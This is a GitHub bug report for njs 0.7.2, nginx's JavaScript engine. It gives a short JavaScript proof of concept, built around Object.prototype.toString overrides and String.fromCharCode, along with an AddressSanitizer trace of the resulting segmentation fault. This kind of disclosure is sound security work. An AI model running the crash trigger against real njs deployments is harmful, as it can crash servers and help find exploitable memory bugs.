You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
OS : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : 7bd570b39297d3d91902c93a624c89b08be7a6fe
Version : 0.7.2
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
Proof of concept
function f2(v) {
Object.prototype.toString = v;
}
Object.prototype.toString = f2;
function f() {
"includes"[{}]();
}
new Promise(f);
String.fromCharCode(0,parseInt);
Stack dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2064577==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004cac48 bp 0x7ffcc1edfbf0 sp 0x7ffcc1edfbb0 T0)
==2064577==The signal is caused by a READ memory access.
==2064577==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used.
#0 0x4cac48 in njs_lvlhsh_bucket_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17
#1 0x4cac48 in njs_lvlhsh_find /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:181:20
#2 0x516c4f in njs_object_property /home/q1iq/Documents/origin/njs/src/njs_object_prop.c:59:15
#3 0x4d5963 in njs_value_to_primitive /home/q1iq/Documents/origin/njs/src/njs_value.c:159:19
#4 0x4fb3ab in njs_value_to_number /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:18:15
#5 0x4fb3ab in njs_value_to_numeric /home/q1iq/Documents/origin/njs/src/njs_value_conversion.h:54:11
#6 0x4fb3ab in njs_string_from_char_code /home/q1iq/Documents/origin/njs/src/njs_string.c:2036:19
#7 0x53bf9c in njs_function_native_call /home/q1iq/Documents/origin/njs/src/njs_function.c:739:11
#8 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
#9 0x53b43a in njs_function_lambda_call /home/q1iq/Documents/origin/njs/src/njs_function.c:703:11
#10 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
#11 0x4deb7b in njs_vm_start /home/q1iq/Documents/origin/njs/src/njs_vm.c:493:11
#12 0x4c8099 in njs_process_script /home/q1iq/Documents/origin/njs/src/njs_shell.c:903:19
#13 0x4c7484 in njs_process_file /home/q1iq/Documents/origin/njs/src/njs_shell.c:632:11
#14 0x4c7484 in main /home/q1iq/Documents/origin/njs/src/njs_shell.c:316:15
#15 0x7f4beb9e10b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#16 0x41dabd in _start (/home/q1iq/Documents/origin/njs/build/njs+0x41dabd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs/src/njs_lvlhsh.c:231:17 in njs_lvlhsh_bucket_find
==2064577==ABORTING
Environment
Proof of concept
Stack dump
Credit
Q1IQ(@Q1IQ)
The text was updated successfully, but these errors were encountered: